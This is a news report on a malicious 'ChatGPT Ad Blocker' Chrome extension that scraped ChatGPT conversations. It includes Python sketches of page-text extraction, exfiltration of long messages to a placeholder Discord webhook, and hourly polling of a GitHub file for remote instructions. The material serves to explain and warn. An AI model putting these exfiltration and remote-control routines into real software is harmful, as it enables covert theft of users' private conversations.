A malicious browser extension disguised as an ad blocker for ChatGPT has been identified as part of a data harvesting operation, raising concerns about emerging scams targeting users following recent changes to OpenAI’s platform.
According to DomainTools, the extension, titled ChatGPT Ad Blocker, was available on the official Google Chrome Web Store as recently as February 10, 2026. While marketed as a tool to remove advertisements, it was instead designed to monitor user interactions with the ChatGPT interface and capture sensitive conversation data.
How the Extension Captured User Conversations
Investigators found that the extension used a technique known as DOM cloning: it created a replica of the page's document object model while filtering out visual elements such as images and styles. This allowed it to isolate and extract clean text, including user prompts and the responses generated by the AI.
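The report does not reproduce the extension's source code, but the general technique it describes, copying page markup and discarding visual elements before extracting text, can be sketched in Python. This is an illustration only; the tag list and function names are assumptions, not the extension's actual implementation.

```python
from html.parser import HTMLParser

# Container tags a scraper would skip when "cloning" a page:
# styling and script elements that carry no conversation text.
# (Void elements such as <img> contribute no text anyway.)
VISUAL_TAGS = {"style", "script", "svg", "noscript"}

class TextCloner(HTMLParser):
    """Walks an HTML document and keeps only visible text,
    skipping anything nested inside visual/styling elements."""

    def __init__(self):
        super().__init__()
        self._skip_depth = 0   # how many VISUAL_TAGS we are inside
        self.chunks = []       # extracted text fragments

    def handle_starttag(self, tag, attrs):
        if tag in VISUAL_TAGS:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in VISUAL_TAGS and self._skip_depth > 0:
            self._skip_depth -= 1

    def handle_data(self, data):
        if self._skip_depth == 0 and data.strip():
            self.chunks.append(data.strip())

def clone_text(html: str) -> str:
    """Return the visible text of a page, styling stripped."""
    parser = TextCloner()
    parser.feed(html)
    return " ".join(parser.chunks)
```

Applied to a chat interface's markup, a routine like this would yield only the conversation text, exactly the kind of isolation the investigators describe.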
The extension flagged any text exceeding 150 characters and transmitted entire conversations to a private channel on the messaging platform Discord, where a bot identified as Captain Hook collected the data and stored it for later access by the attackers.
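The exfiltration step can be sketched as a length filter followed by a webhook post, which is a common way to push data into a Discord channel. The webhook URL below is a placeholder and the payload shape is an assumption; the report only states that flagged conversations reached a private Discord channel.

```python
import json
from urllib import request

# Placeholder address -- the real operation used a private Discord
# channel; this URL stands in for whatever endpoint received the data.
WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>"
MIN_LENGTH = 150  # threshold reported by DomainTools

def should_exfiltrate(text: str) -> bool:
    """Flag conversation text longer than the 150-character threshold."""
    return len(text) > MIN_LENGTH

def send_to_discord(text: str) -> None:
    """POST flagged text to the webhook as a Discord message payload.
    (Network call -- not exercised in this sketch.)"""
    body = json.dumps({"content": text}).encode()
    req = request.Request(
        WEBHOOK_URL,
        data=body,
        headers={"Content-Type": "application/json"},
    )
    request.urlopen(req)
```

The length threshold acts as a crude signal-to-noise filter: short UI strings are ignored, while substantive prompts and responses are shipped out wholesale.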
To maintain persistence and avoid detection, the extension checked a GitHub file every hour for updated instructions, enabling attackers to adjust their methods remotely without alerting users.
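This remote-instruction pattern amounts to using a public file host as a lightweight command-and-control channel. A minimal sketch, assuming a JSON instruction file (the URL, field names, and merge logic below are hypothetical, not taken from the extension):

```python
import json
from urllib import request

# Placeholder path -- the report says instructions were fetched from
# a file on GitHub; the repository and filename here are assumptions.
CONFIG_URL = "https://raw.githubusercontent.com/<user>/<repo>/main/config.json"
POLL_INTERVAL = 3600  # seconds; the reported check ran hourly

def fetch_instructions(url: str = CONFIG_URL) -> dict:
    """Download and parse the remote instruction file (network call)."""
    with request.urlopen(url) as resp:
        return json.loads(resp.read())

def apply_instructions(remote: dict, current: dict) -> dict:
    """Merge remote overrides into current settings, letting the
    operator retune behaviour (e.g. a length threshold) without
    shipping an extension update."""
    return {**current, **remote}

# Hourly polling loop (not executed in this sketch):
# while True:
#     settings = apply_instructions(fetch_instructions(), settings)
#     time.sleep(POLL_INTERVAL)
```

Because the instruction file lives on ordinary infrastructure and the poll looks like routine traffic, the scheme leaves little for store reviewers or users to notice.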
Links to Developer and Wider AI Ecosystem
The developer behind the extension operates under the online name krittinkalra and has been linked to AI platforms such as Writecream and AI4ChatCo, both of which reportedly have more than 1.5 million users. While there is no confirmed evidence that these platforms are involved in data theft, the association has raised additional concerns.
DomainTools noted that the activity appears to be taking advantage of OpenAI's introduction of advertisements for free-tier users. The extension's stated purpose of blocking ads may have served as a pretext for distributing malware designed to harvest conversation data, including prompts, metadata, and structural details.
Investigators also observed that the developer’s account had been inactive for five years before reappearing with the extension. It remains unclear whether the account itself was compromised or deliberately used to distribute the tool.
Data Exposure Risks and Broader Implications
Further analysis linked the operation to several suspicious websites, including blockaiads.com, openadblock.com, and gptadblock.com. The stolen data was found to include not only chat content but also technical metadata and information about the user interface.
Security researchers warned that such data collection poses significant risks, particularly for users who share sensitive personal or business information through AI platforms. DomainTools advised users to manage advertisements through official platform settings rather than installing third-party tools that may act as intermediaries.
The findings underscore how quickly malicious actors are adapting to changes in widely used AI services, exploiting user behavior and platform updates to gain access to private data.